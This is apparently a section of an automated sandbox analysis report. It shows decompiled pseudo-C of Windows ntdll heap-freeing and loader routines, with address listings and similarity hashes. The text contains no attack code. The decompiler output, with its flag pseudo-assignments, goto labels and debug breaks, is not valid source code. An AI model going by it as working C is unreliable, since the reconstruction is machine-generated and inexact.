                                                                                          					_v5 = _a8;
                                                                                          					L3:
                                                                                          					_t381 = _a4;
                                                                                          					goto L4;
                                                                                          				} else {
                                                                                          					__eflags =  *(__ecx + 0x4c);
                                                                                          					if( *(__ecx + 0x4c) != 0) {
                                                                                          						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                                                          						 *_t419 = _t411;
                                                                                          						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                                                          						__eflags = _t411 >> 0x18 - _t378;
                                                                                          						if(__eflags != 0) {
                                                                                          							_push(_t378);
                                                                                          							E01BEFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                                                          						}
                                                                                          					}
                                                                                          					_t250 = _a8;
                                                                                          					_v5 = _t250;
                                                                                          					__eflags = _t250;
                                                                                          					if(_t250 != 0) {
                                                                                          						_t400 = _t414[6];
                                                                                          						_t53 =  &(_t414[4]); // -16
                                                                                          						_t348 = _t53;
                                                                                          						_t251 =  *_t348;
                                                                                          						_v12 = _t251;
                                                                                          						_v16 = _t400;
                                                                                          						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                                                          						__eflags =  *_t400 - _t252;
                                                                                          						if( *_t400 != _t252) {
                                                                                          							L49:
                                                                                          							_push(_t348);
                                                                                          							_push( *_t400);
                                                                                          							E01BFA80D(_t307, 0xd, _t348, _t252);
                                                                                          							L50:
                                                                                          							_v5 = 0;
                                                                                          							goto L11;
                                                                                          						}
                                                                                          						__eflags =  *_t400 - _t348;
                                                                                          						if( *_t400 != _t348) {
                                                                                          							goto L49;
                                                                                          						}
                                                                                          						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                          						_t407 =  *(_t307 + 0xb4);
                                                                                          						__eflags = _t407;
                                                                                          						if(_t407 == 0) {
                                                                                          							L36:
                                                                                          							_t364 = _v16;
                                                                                          							_t282 = _v12;
                                                                                          							 *_t364 = _t282;
                                                                                          							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                                                          							__eflags = _t414[1] & 0x00000008;
                                                                                          							if((_t414[1] & 0x00000008) == 0) {
                                                                                          								L39:
                                                                                          								_t365 = _t414[1];
                                                                                          								__eflags = _t365 & 0x00000004;
                                                                                          								if((_t365 & 0x00000004) != 0) {
                                                                                          									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                          									_v12 = _t284;
                                                                                          									__eflags = _t365 & 0x00000002;
                                                                                          									if((_t365 & 0x00000002) != 0) {
                                                                                          										__eflags = _t284 - 4;
                                                                                          										if(_t284 > 4) {
                                                                                          											_t284 = _t284 - 4;
                                                                                          											__eflags = _t284;
                                                                                          											_v12 = _t284;
                                                                                          										}
                                                                                          									}
                                                                                          									_t78 =  &(_t414[8]); // -8
                                                                                          									_t286 = E01B8D540(_t78, _t284, 0xfeeefeee);
                                                                                          									_v16 = _t286;
                                                                                          									__eflags = _t286 - _v12;
                                                                                          									if(_t286 != _v12) {
                                                                                          										_t366 =  *[fs:0x30];
                                                                                          										__eflags =  *(_t366 + 0xc);
                                                                                          										if( *(_t366 + 0xc) == 0) {
                                                                                          											_push("HEAP: ");
                                                                                          											E01B3B150();
                                                                                          										} else {
                                                                                          											E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          										}
                                                                                          										_push(_v16 + 0x10 + _t414);
                                                                                          										E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                          										_t292 =  *[fs:0x30];
                                                                                          										_t421 = _t421 + 0xc;
                                                                                          										__eflags =  *((char*)(_t292 + 2));
                                                                                          										if( *((char*)(_t292 + 2)) != 0) {
                                                                                          											 *0x1c26378 = 1;
                                                                                          											asm("int3");
                                                                                          											 *0x1c26378 = 0;
                                                                                          										}
                                                                                          									}
                                                                                          								}
                                                                                          								goto L50;
                                                                                          							}
                                                                                          							_t296 = E01B5A229(_t307, _t414);
                                                                                          							__eflags = _t296;
                                                                                          							if(_t296 != 0) {
                                                                                          								goto L39;
                                                                                          							} else {
                                                                                          								L01B5A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                          								goto L50;
                                                                                          							}
                                                                                          						} else {
                                                                                          							_t373 =  *_t414 & 0x0000ffff;
                                                                                          							while(1) {
                                                                                          								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                                                          								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                                                          									_t301 = _t373;
                                                                                          									break;
                                                                                          								}
                                                                                          								_t299 =  *_t407;
                                                                                          								__eflags = _t299;
                                                                                          								if(_t299 == 0) {
                                                                                          									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                          									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                          									break;
                                                                                          								} else {
                                                                                          									_t407 = _t299;
                                                                                          									continue;
                                                                                          								}
                                                                                          							}
                                                                                          							_t62 =  &(_t414[4]); // -16
                                                                                          							E01B5BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                                                          							goto L36;
                                                                                          						}
                                                                                          					}
                                                                                          					L11:
                                                                                          					_t402 = _t419[6];
                                                                                          					_t25 =  &(_t419[4]); // -16
                                                                                          					_t350 = _t25;
                                                                                          					_t254 =  *_t350;
                                                                                          					_v12 = _t254;
                                                                                          					_v20 = _t402;
                                                                                          					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                                                          					__eflags =  *_t402 - _t255;
                                                                                          					if( *_t402 != _t255) {
                                                                                          						L61:
                                                                                          						_push(_t350);
                                                                                          						_push( *_t402);
                                                                                          						E01BFA80D(_t307, 0xd, _t350, _t255);
                                                                                          						goto L3;
                                                                                          					}
                                                                                          					__eflags =  *_t402 - _t350;
                                                                                          					if( *_t402 != _t350) {
                                                                                          						goto L61;
                                                                                          					}
                                                                                          					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                                                          					_t404 =  *(_t307 + 0xb4);
                                                                                          					__eflags = _t404;
                                                                                          					if(_t404 == 0) {
                                                                                          						L20:
                                                                                          						_t352 = _v20;
                                                                                          						_t258 = _v12;
                                                                                          						 *_t352 = _t258;
                                                                                          						 *(_t258 + 4) = _t352;
                                                                                          						__eflags = _t419[1] & 0x00000008;
                                                                                          						if((_t419[1] & 0x00000008) != 0) {
                                                                                          							_t259 = E01B5A229(_t307, _t419);
                                                                                          							__eflags = _t259;
                                                                                          							if(_t259 != 0) {
                                                                                          								goto L21;
                                                                                          							} else {
                                                                                          								L01B5A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                                                          								goto L3;
                                                                                          							}
                                                                                          						}
                                                                                          						L21:
                                                                                          						_t354 = _t419[1];
                                                                                          						__eflags = _t354 & 0x00000004;
                                                                                          						if((_t354 & 0x00000004) != 0) {
                                                                                          							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                                                          							__eflags = _t354 & 0x00000002;
                                                                                          							if((_t354 & 0x00000002) != 0) {
                                                                                          								__eflags = _t415 - 4;
                                                                                          								if(_t415 > 4) {
                                                                                          									_t415 = _t415 - 4;
                                                                                          									__eflags = _t415;
                                                                                          								}
                                                                                          							}
                                                                                          							_t91 =  &(_t419[8]); // -8
                                                                                          							_t262 = E01B8D540(_t91, _t415, 0xfeeefeee);
                                                                                          							_v20 = _t262;
                                                                                          							__eflags = _t262 - _t415;
                                                                                          							if(_t262 != _t415) {
                                                                                          								_t357 =  *[fs:0x30];
                                                                                          								__eflags =  *(_t357 + 0xc);
                                                                                          								if( *(_t357 + 0xc) == 0) {
                                                                                          									_push("HEAP: ");
                                                                                          									E01B3B150();
                                                                                          								} else {
                                                                                          									E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          								}
                                                                                          								_push(_v20 + 0x10 + _t419);
                                                                                          								E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                                                          								_t271 =  *[fs:0x30];
                                                                                          								_t421 = _t421 + 0xc;
                                                                                          								__eflags =  *((char*)(_t271 + 2));
                                                                                          								if( *((char*)(_t271 + 2)) != 0) {
                                                                                          									 *0x1c26378 = 1;
                                                                                          									asm("int3");
                                                                                          									 *0x1c26378 = 0;
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						_t381 = _a4;
                                                                                          						_t414 = _t419;
                                                                                          						_t419[1] = 0;
                                                                                          						_t419[3] = 0;
                                                                                          						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                                                          						 *_t419 =  *_t381;
                                                                                          						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                                                          						L4:
                                                                                          						_t420 = _t414 +  *_t381 * 8;
                                                                                          						if( *(_t307 + 0x4c) == 0) {
                                                                                          							L6:
                                                                                          							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                                                          								__eflags =  *(_t307 + 0x4c);
                                                                                          								if( *(_t307 + 0x4c) != 0) {
                                                                                          									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                                                          									 *_t420 = _t390;
                                                                                          									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                                                          									__eflags = _t390 >> 0x18 - _t328;
                                                                                          									if(__eflags != 0) {
                                                                                          										_push(_t328);
                                                                                          										E01BEFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                                                          									}
                                                                                          								}
                                                                                          								__eflags = _v5;
                                                                                          								if(_v5 == 0) {
                                                                                          									L94:
                                                                                          									_t382 = _t420[3];
                                                                                          									_t137 =  &(_t420[2]); // -16
                                                                                          									_t309 = _t137;
                                                                                          									_t186 =  *_t309;
                                                                                          									_v20 = _t186;
                                                                                          									_v16 = _t382;
                                                                                          									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                                                          									__eflags =  *_t382 - _t187;
                                                                                          									if( *_t382 != _t187) {
                                                                                          										L63:
                                                                                          										_push(_t309);
                                                                                          										_push( *_t382);
                                                                                          										_push(_t187);
                                                                                          										_push(_t309);
                                                                                          										_push(0xd);
                                                                                          										L64:
                                                                                          										E01BFA80D(_t307);
                                                                                          										continue;
                                                                                          									}
                                                                                          									__eflags =  *_t382 - _t309;
                                                                                          									if( *_t382 != _t309) {
                                                                                          										goto L63;
                                                                                          									}
                                                                                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                                                          									_t393 =  *(_t307 + 0xb4);
                                                                                          									__eflags = _t393;
                                                                                          									if(_t393 == 0) {
                                                                                          										L104:
                                                                                          										_t330 = _v16;
                                                                                          										_t190 = _v20;
                                                                                          										 *_t330 = _t190;
                                                                                          										 *(_t190 + 4) = _t330;
                                                                                          										__eflags = _t420[0] & 0x00000008;
                                                                                          										if((_t420[0] & 0x00000008) == 0) {
                                                                                          											L107:
                                                                                          											_t331 = _t420[0];
                                                                                          											__eflags = _t331 & 0x00000004;
                                                                                          											if((_t331 & 0x00000004) != 0) {
                                                                                          												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                                                          												_v12 = _t196;
                                                                                          												__eflags = _t331 & 0x00000002;
                                                                                          												if((_t331 & 0x00000002) != 0) {
                                                                                          													__eflags = _t196 - 4;
                                                                                          													if(_t196 > 4) {
                                                                                          														_t196 = _t196 - 4;
                                                                                          														__eflags = _t196;
                                                                                          														_v12 = _t196;
                                                                                          													}
                                                                                          												}
                                                                                          												_t162 =  &(_t420[4]); // -8
                                                                                          												_t197 = E01B8D540(_t162, _t196, 0xfeeefeee);
                                                                                          												_v20 = _t197;
                                                                                          												__eflags = _t197 - _v12;
                                                                                          												if(_t197 != _v12) {
                                                                                          													_t335 =  *[fs:0x30];
                                                                                          													__eflags =  *(_t335 + 0xc);
                                                                                          													if( *(_t335 + 0xc) == 0) {
                                                                                          														_push("HEAP: ");
                                                                                          														E01B3B150();
                                                                                          													} else {
                                                                                          														E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          													}
                                                                                          													_push(_v20 + 0x10 + _t420);
                                                                                          													E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                                                          													_t203 =  *[fs:0x30];
                                                                                          													__eflags =  *((char*)(_t203 + 2));
                                                                                          													if( *((char*)(_t203 + 2)) != 0) {
                                                                                          														 *0x1c26378 = 1;
                                                                                          														asm("int3");
                                                                                          														 *0x1c26378 = 0;
                                                                                          													}
                                                                                          												}
                                                                                          											}
                                                                                          											_t394 = _a4;
                                                                                          											_t414[1] = 0;
                                                                                          											_t414[3] = 0;
                                                                                          											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                                                          											 *_t414 =  *_t394;
                                                                                          											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                                                          											break;
                                                                                          										}
                                                                                          										_t207 = E01B5A229(_t307, _t420);
                                                                                          										__eflags = _t207;
                                                                                          										if(_t207 != 0) {
                                                                                          											goto L107;
                                                                                          										}
                                                                                          										L01B5A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                                                          										continue;
                                                                                          									}
                                                                                          									_t342 =  *_t420 & 0x0000ffff;
                                                                                          									while(1) {
                                                                                          										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                                                          										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                                                          											break;
                                                                                          										}
                                                                                          										_t210 =  *_t393;
                                                                                          										__eflags = _t210;
                                                                                          										if(_t210 == 0) {
                                                                                          											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                          											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                          											L103:
                                                                                          											_t146 =  &(_t420[2]); // -16
                                                                                          											E01B5BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                                                          											goto L104;
                                                                                          										}
                                                                                          										_t393 = _t210;
                                                                                          									}
                                                                                          									_t212 = _t342;
                                                                                          									goto L103;
                                                                                          								} else {
                                                                                          									_t384 = _t414[6];
                                                                                          									_t102 =  &(_t414[4]); // -16
                                                                                          									_t311 = _t102;
                                                                                          									_t215 =  *_t311;
                                                                                          									_v20 = _t215;
                                                                                          									_v16 = _t384;
                                                                                          									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                                                          									__eflags =  *_t384 - _t216;
                                                                                          									if( *_t384 != _t216) {
                                                                                          										L92:
                                                                                          										_push(_t311);
                                                                                          										_push( *_t384);
                                                                                          										E01BFA80D(_t307, 0xd, _t311, _t216);
                                                                                          										L93:
                                                                                          										_v5 = 0;
                                                                                          										goto L94;
                                                                                          									}
                                                                                          									__eflags =  *_t384 - _t311;
                                                                                          									if( *_t384 != _t311) {
                                                                                          										goto L92;
                                                                                          									}
                                                                                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                          									_t386 =  *(_t307 + 0xb4);
                                                                                          									__eflags = _t386;
                                                                                          									if(_t386 == 0) {
                                                                                          										L79:
                                                                                          										_t313 = _v16;
                                                                                          										_t219 = _v20;
                                                                                          										 *_t313 = _t219;
                                                                                          										 *(_t219 + 4) = _t313;
                                                                                          										__eflags = _t414[1] & 0x00000008;
                                                                                          										if((_t414[1] & 0x00000008) == 0) {
                                                                                          											L82:
                                                                                          											_t314 = _t414[1];
                                                                                          											__eflags = _t314 & 0x00000004;
                                                                                          											if((_t314 & 0x00000004) != 0) {
                                                                                          												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                          												_v12 = _t221;
                                                                                          												__eflags = _t314 & 0x00000002;
                                                                                          												if((_t314 & 0x00000002) != 0) {
                                                                                          													__eflags = _t221 - 4;
                                                                                          													if(_t221 > 4) {
                                                                                          														_t221 = _t221 - 4;
                                                                                          														__eflags = _t221;
                                                                                          														_v12 = _t221;
                                                                                          													}
                                                                                          												}
                                                                                          												_t127 =  &(_t414[8]); // -8
                                                                                          												_t222 = E01B8D540(_t127, _t221, 0xfeeefeee);
                                                                                          												_v20 = _t222;
                                                                                          												__eflags = _t222 - _v12;
                                                                                          												if(_t222 != _v12) {
                                                                                          													_t316 =  *[fs:0x30];
                                                                                          													__eflags =  *(_t316 + 0xc);
                                                                                          													if( *(_t316 + 0xc) == 0) {
                                                                                          														_push("HEAP: ");
                                                                                          														E01B3B150();
                                                                                          													} else {
                                                                                          														E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          													}
                                                                                          													_push(_v20 + 0x10 + _t414);
                                                                                          													E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                          													_t228 =  *[fs:0x30];
                                                                                          													_t421 = _t421 + 0xc;
                                                                                          													__eflags =  *((char*)(_t228 + 2));
                                                                                          													if( *((char*)(_t228 + 2)) != 0) {
                                                                                          														 *0x1c26378 = 1;
                                                                                          														asm("int3");
                                                                                          														 *0x1c26378 = 0;
                                                                                          													}
                                                                                          												}
                                                                                          											}
                                                                                          											goto L93;
                                                                                          										}
                                                                                          										_t232 = E01B5A229(_t307, _t414);
                                                                                          										__eflags = _t232;
                                                                                          										if(_t232 != 0) {
                                                                                          											goto L82;
                                                                                          										}
                                                                                          										L01B5A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                          										goto L93;
                                                                                          									}
                                                                                          									_t323 =  *_t414 & 0x0000ffff;
                                                                                          									while(1) {
                                                                                          										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                                                          										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                                                          											break;
                                                                                          										}
                                                                                          										_t235 =  *_t386;
                                                                                          										__eflags = _t235;
                                                                                          										if(_t235 == 0) {
                                                                                          											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                          											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                          											L78:
                                                                                          											_t111 =  &(_t414[4]); // -16
                                                                                          											E01B5BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                                                          											goto L79;
                                                                                          										}
                                                                                          										_t386 = _t235;
                                                                                          									}
                                                                                          									_t237 = _t323;
                                                                                          									goto L78;
                                                                                          								}
                                                                                          							}
                                                                                          							return _t414;
                                                                                          						}
                                                                                          						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                                                          						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                                                          						if(_t398 >> 0x18 != _t347) {
                                                                                          							_push(_t347);
                                                                                          							_push(0);
                                                                                          							_push(0);
                                                                                          							_push(_t420);
                                                                                          							_push(3);
                                                                                          							goto L64;
                                                                                          						}
                                                                                          						goto L6;
                                                                                          					} else {
                                                                                          						_t277 =  *_t419 & 0x0000ffff;
                                                                                          						_v16 = _t277;
                                                                                          						while(1) {
                                                                                          							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                                                          							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                                                          								break;
                                                                                          							}
                                                                                          							_t279 =  *_t404;
                                                                                          							__eflags = _t279;
                                                                                          							if(_t279 == 0) {
                                                                                          								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                          								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                          								break;
                                                                                          							} else {
                                                                                          								_t404 = _t279;
                                                                                          								_t277 =  *_t419 & 0x0000ffff;
                                                                                          								continue;
                                                                                          							}
                                                                                          						}
                                                                                          						E01B5BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                                                          						goto L20;
                                                                                          					}
                                                                                          				}
                                                                                          			}
                                                                                          0x01ba1859
                                                                                          0x01ba1859
                                                                                          0x01ba185c
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba1851
                                                                                          0x01ba1853
                                                                                          0x01ba1855
                                                                                          0x01ba1865
                                                                                          0x01ba1865
                                                                                          0x01ba1866
                                                                                          0x01ba1868
                                                                                          0x01ba1870
                                                                                          0x00000000
                                                                                          0x01ba1870
                                                                                          0x01ba1857
                                                                                          0x01ba1857
                                                                                          0x01ba185e
                                                                                          0x00000000
                                                                                          0x01ba16d2
                                                                                          0x01ba16d2
                                                                                          0x01ba16d5
                                                                                          0x01ba16d5
                                                                                          0x01ba16d8
                                                                                          0x01ba16da
                                                                                          0x01ba16dd
                                                                                          0x01ba16e0
                                                                                          0x01ba16e3
                                                                                          0x01ba16e5
                                                                                          0x01ba1808
                                                                                          0x01ba1808
                                                                                          0x01ba1809
                                                                                          0x01ba1812
                                                                                          0x01ba1817
                                                                                          0x01ba1817
                                                                                          0x00000000
                                                                                          0x01ba1817
                                                                                          0x01ba16eb
                                                                                          0x01ba16ed
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba16f6
                                                                                          0x01ba16f9
                                                                                          0x01ba16ff
                                                                                          0x01ba1701
                                                                                          0x01ba172c
                                                                                          0x01ba172c
                                                                                          0x01ba172f
                                                                                          0x01ba1732
                                                                                          0x01ba1734
                                                                                          0x01ba1737
                                                                                          0x01ba173b
                                                                                          0x01ba175e
                                                                                          0x01ba175e
                                                                                          0x01ba1761
                                                                                          0x01ba1764
                                                                                          0x01ba176d
                                                                                          0x01ba1774
                                                                                          0x01ba1777
                                                                                          0x01ba177a
                                                                                          0x01ba177c
                                                                                          0x01ba177f
                                                                                          0x01ba1781
                                                                                          0x01ba1781
                                                                                          0x01ba1784
                                                                                          0x01ba1784
                                                                                          0x01ba177f
                                                                                          0x01ba178c
                                                                                          0x01ba1791
                                                                                          0x01ba1796
                                                                                          0x01ba1799
                                                                                          0x01ba179c
                                                                                          0x01ba179e
                                                                                          0x01ba17a5
                                                                                          0x01ba17a9
                                                                                          0x01ba17c9
                                                                                          0x01ba17ce
                                                                                          0x01ba17ab
                                                                                          0x01ba17c1
                                                                                          0x01ba17c6
                                                                                          0x01ba17dc
                                                                                          0x01ba17e3
                                                                                          0x01ba17e8
                                                                                          0x01ba17ee
                                                                                          0x01ba17f1
                                                                                          0x01ba17f5
                                                                                          0x01ba17f7
                                                                                          0x01ba17fe
                                                                                          0x01ba17ff
                                                                                          0x01ba17ff
                                                                                          0x01ba17f5
                                                                                          0x01ba179c
                                                                                          0x00000000
                                                                                          0x01ba1764
                                                                                          0x01ba1741
                                                                                          0x01ba1746
                                                                                          0x01ba1748
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba1754
                                                                                          0x00000000
                                                                                          0x01ba1754
                                                                                          0x01ba1703
                                                                                          0x01ba1710
                                                                                          0x01ba1710
                                                                                          0x01ba1713
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba1708
                                                                                          0x01ba170a
                                                                                          0x01ba170c
                                                                                          0x01ba171c
                                                                                          0x01ba171c
                                                                                          0x01ba171d
                                                                                          0x01ba171f
                                                                                          0x01ba1727
                                                                                          0x00000000
                                                                                          0x01ba1727
                                                                                          0x01ba170e
                                                                                          0x01ba170e
                                                                                          0x01ba1715
                                                                                          0x00000000
                                                                                          0x01ba1715
                                                                                          0x01ba16cc
                                                                                          0x01b59a45
                                                                                          0x01b59a45
                                                                                          0x01b59a0e
                                                                                          0x01b59a1c
                                                                                          0x01b59a23
                                                                                          0x01ba167e
                                                                                          0x01ba167f
                                                                                          0x01ba1681
                                                                                          0x01ba1683
                                                                                          0x01ba1684
                                                                                          0x00000000
                                                                                          0x01ba1684
                                                                                          0x00000000
                                                                                          0x01b59aad
                                                                                          0x01b59aad
                                                                                          0x01b59ab0
                                                                                          0x01b59ab3
                                                                                          0x01b59ab3
                                                                                          0x01b59ab6
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b59ab8
                                                                                          0x01b59aba
                                                                                          0x01b59abc
                                                                                          0x01b59ac8
                                                                                          0x01b59ac8
                                                                                          0x00000000
                                                                                          0x01b59abe
                                                                                          0x01b59abe
                                                                                          0x01b59ac0
                                                                                          0x00000000
                                                                                          0x01b59ac0
                                                                                          0x01b59abc
                                                                                          0x01b59ad2
                                                                                          0x00000000
                                                                                          0x01b59ad2
                                                                                          0x01b59aab

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          • API String ID: 0-3178619729
                                                                                          • Opcode ID: 47dbe0ca61e5c2fb63e8a07a3769f476855b7e24731a6146bb8e0eb7e7d95f37
                                                                                          • Instruction ID: 60d8282cd62def4db91948a64b9f4f1011af5c4036a651e754a85e6adc47a28f
                                                                                          • Opcode Fuzzy Hash: 47dbe0ca61e5c2fb63e8a07a3769f476855b7e24731a6146bb8e0eb7e7d95f37
                                                                                          • Instruction Fuzzy Hash: F722F2706042429FEB6DCF2DC485B7ABBB5EF44704F5885EAE8868B346E771D881CB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 83%
                                                                                          			E01B48794(void* __ecx) {
                                                                                          				signed int _v0;
                                                                                          				char _v8;
                                                                                          				signed int _v12;
                                                                                          				void* _v16;
                                                                                          				signed int _v20;
                                                                                          				intOrPtr _v24;
                                                                                          				signed int _v28;
                                                                                          				signed int _v32;
                                                                                          				signed int _v40;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				void* __ebp;
                                                                                          				intOrPtr* _t77;
                                                                                          				signed int _t80;
                                                                                          				signed char _t81;
                                                                                          				signed int _t87;
                                                                                          				signed int _t91;
                                                                                          				void* _t92;
                                                                                          				void* _t94;
                                                                                          				signed int _t95;
                                                                                          				signed int _t103;
                                                                                          				signed int _t105;
                                                                                          				signed int _t110;
                                                                                          				signed int _t118;
                                                                                          				intOrPtr* _t121;
                                                                                          				intOrPtr _t122;
                                                                                          				signed int _t125;
                                                                                          				signed int _t129;
                                                                                          				signed int _t131;
                                                                                          				signed int _t134;
                                                                                          				signed int _t136;
                                                                                          				signed int _t143;
                                                                                          				signed int* _t147;
                                                                                          				signed int _t151;
                                                                                          				void* _t153;
                                                                                          				signed int* _t157;
                                                                                          				signed int _t159;
                                                                                          				signed int _t161;
                                                                                          				signed int _t166;
                                                                                          				signed int _t168;
                                                                                          
                                                                                          				_push(__ecx);
                                                                                          				_t153 = __ecx;
                                                                                          				_t159 = 0;
                                                                                          				_t121 = __ecx + 0x3c;
                                                                                          				if( *_t121 == 0) {
                                                                                          					L2:
                                                                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                          							L6:
                                                                                          							if(E01B4934A() != 0) {
                                                                                          								_t159 = E01BBA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                          								__eflags = _t159;
                                                                                          								if(_t159 < 0) {
                                                                                          									_t81 =  *0x1c25780; // 0x0
                                                                                          									__eflags = _t81 & 0x00000003;
                                                                                          									if((_t81 & 0x00000003) != 0) {
                                                                                          										_push(_t159);
                                                                                          										E01BB5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                          										_t81 =  *0x1c25780; // 0x0
                                                                                          									}
                                                                                          									__eflags = _t81 & 0x00000010;
                                                                                          									if((_t81 & 0x00000010) != 0) {
                                                                                          										asm("int3");
                                                                                          									}
                                                                                          								}
                                                                                          							}
                                                                                          						} else {
                                                                                          							_t159 = E01B4849B(0, _t122, _t153, _t159, _t180);
                                                                                          							if(_t159 >= 0) {
                                                                                          								goto L6;
                                                                                          							}
                                                                                          						}
                                                                                          						_t80 = _t159;
                                                                                          						goto L8;
                                                                                          					} else {
                                                                                          						_t125 = 0x13;
                                                                                          						asm("int 0x29");
                                                                                          						_push(0);
                                                                                          						_push(_t159);
                                                                                          						_t161 = _t125;
                                                                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                          						_t143 = 0;
                                                                                          						_v40 = _t161;
                                                                                          						_t118 = 0;
                                                                                          						_push(_t153);
                                                                                          						__eflags = _t87;
                                                                                          						if(_t87 != 0) {
                                                                                          							_t118 = _t87 + 0x5d8;
                                                                                          							__eflags = _t118;
                                                                                          							if(_t118 == 0) {
                                                                                          								L46:
                                                                                          								_t118 = 0;
                                                                                          							} else {
                                                                                          								__eflags =  *(_t118 + 0x30);
                                                                                          								if( *(_t118 + 0x30) == 0) {
                                                                                          									goto L46;
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						_v32 = 0;
                                                                                          						_v28 = 0;
                                                                                          						_v16 = 0;
                                                                                          						_v20 = 0;
                                                                                          						_v12 = 0;
